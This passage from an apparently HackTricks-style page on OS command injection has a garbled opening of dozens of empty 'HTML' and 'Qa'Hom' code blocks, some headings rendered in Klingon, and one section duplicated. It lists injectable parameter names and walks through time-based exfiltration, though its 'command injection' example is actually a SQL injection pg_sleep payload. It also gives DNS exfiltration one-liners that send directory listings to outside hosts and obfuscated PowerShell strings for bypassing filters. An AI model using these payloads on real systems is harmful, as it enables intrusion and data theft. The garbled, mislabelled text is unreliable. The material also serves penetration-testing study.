|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
|
|
**HTML**
|
|
|
|
```html
|
|
```
|
|
|
|
**Qa'Hom**
|
|
|
|
```markdown
|
|
```
|
|
```
|
|
?cmd={payload}
|
|
?exec={payload}
|
|
?command={payload}
|
|
?execute{payload}
|
|
?ping={payload}
|
|
?query={payload}
|
|
?jump={payload}
|
|
?code={payload}
|
|
?reg={payload}
|
|
?do={payload}
|
|
?func={payload}
|
|
?arg={payload}
|
|
?option={payload}
|
|
?load={payload}
|
|
?process={payload}
|
|
?step={payload}
|
|
?read={payload}
|
|
?function={payload}
|
|
?req={payload}
|
|
?feature={payload}
|
|
?exe={payload}
|
|
?module={payload}
|
|
?payload={payload}
|
|
?run={payload}
|
|
?print={payload}
|
|
```
|
|
### Time based data exfiltration
|
|
|
|
Extracting data: char by char
|
|
|
|
#### Description
|
|
|
|
Time-based data exfiltration is a technique used to extract data from a target system by sending requests that cause delays in the response time. This can be useful in scenarios where direct data leakage is not possible, but an attacker can still exploit vulnerabilities to extract information.
|
|
|
|
One approach to time-based data exfiltration is extracting data character by character. This involves sending requests that extract one character at a time from the target system's database or file system. By carefully crafting the requests and measuring the response time, an attacker can reconstruct the desired data.
|
|
|
|
#### Methodology
|
|
|
|
1. Identify the injection point: Find a vulnerable parameter where command injection is possible. This could be in a web application's input field, URL parameter, or any other user-controllable input.
|
|
|
|
2. Determine the character set: Understand the character set used by the target system's database or file system. This could be ASCII, Unicode, or any other encoding scheme.
|
|
|
|
3. Extract one character at a time: Craft a payload that extracts one character at a time from the target system. For example, in SQL injection, you can use the `SUBSTRING()` function to extract a specific character at a given position.
|
|
|
|
4. Measure the response time: Send the crafted payload and measure the response time. If the response time is significantly longer for a specific character, it indicates that the character is present in the target system.
|
|
|
|
5. Repeat the process: Iterate through all possible characters in the character set and extract the entire data by combining the characters that are present in the target system.
|
|
|
|
#### Example
|
|
|
|
Let's consider a web application that takes user input and performs a command execution without proper input validation. The vulnerable parameter is the `username` field, which is susceptible to command injection.
|
|
|
|
The attacker can craft a payload like the following to extract the username character by character:
|
|
|
|
```
|
|
' UNION SELECT CASE WHEN (SUBSTRING((SELECT username FROM users LIMIT 1),1,1)='a') THEN pg_sleep(10) ELSE pg_sleep(0) END --
|
|
```
|
|
|
|
By measuring the response time, the attacker can determine if the first character of the username is 'a'. By repeating this process for all possible characters, the attacker can extract the entire username.
|
|
|
|
#### Mitigation
|
|
|
|
To prevent time-based data exfiltration, it is important to implement proper input validation and sanitization techniques. Here are some mitigation measures:
|
|
|
|
- Use parameterized queries or prepared statements to prevent SQL injection attacks.
|
|
- Validate and sanitize user input to prevent command injection.
|
|
- Implement rate limiting or request throttling to detect and block suspicious requests.
|
|
- Regularly update and patch software to fix known vulnerabilities.
|
|
- Implement a web application firewall (WAF) to detect and block malicious requests.
|
|
|
|
By following these best practices, you can significantly reduce the risk of time-based data exfiltration attacks.
|
|
```
|
|
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
|
|
real 0m5.007s
|
|
user 0m0.000s
|
|
sys 0m0.000s
|
|
|
|
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
|
|
real 0m0.002s
|
|
user 0m0.000s
|
|
sys 0m0.000s
|
|
```
|
|
### DNS based data exfiltration
|
|
|
|
Based on the tool from `https://github.com/HoLyVieR/dnsbin` also hosted at dnsbin.zhack.ca
|
|
|
|
### DNS based data exfiltration
|
|
|
|
Based on the tool from `https://github.com/HoLyVieR/dnsbin` also hosted at dnsbin.zhack.ca
|
|
```
|
|
1. Go to http://dnsbin.zhack.ca/
|
|
2. Execute a simple 'ls'
|
|
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
|
|
```
|
|
|
|
```
|
|
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
|
|
```
|
|
### DNS vItlhutlh
|
|
|
|
* dnsbin.zhack.ca
|
|
* pingb.in
|
|
|
|
### Filtering bypass
|
|
|
|
#### Windows
|
|
```
|
|
powershell C:**2\n??e*d.*? # notepad
|
|
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc
|
|
```
|
|
#### Linux
|
|
|
|
{% content-ref url="../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md" %}
|
|
[bypass-bash-restrictions.md](../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md)
|
|
{% endcontent-ref %}
|
|
|
|
## Brute-Force Detection List
|
|
|
|
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt" %}
|
|
|
|
## References
|
|
|
|
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
|
|
* [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection)
|
|
|
|
<details>
|
|
|
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Other ways to support HackTricks:
|
|
|
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
|
|
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
\
|
|
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
|
Get Access Today:
|
|
|
|
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|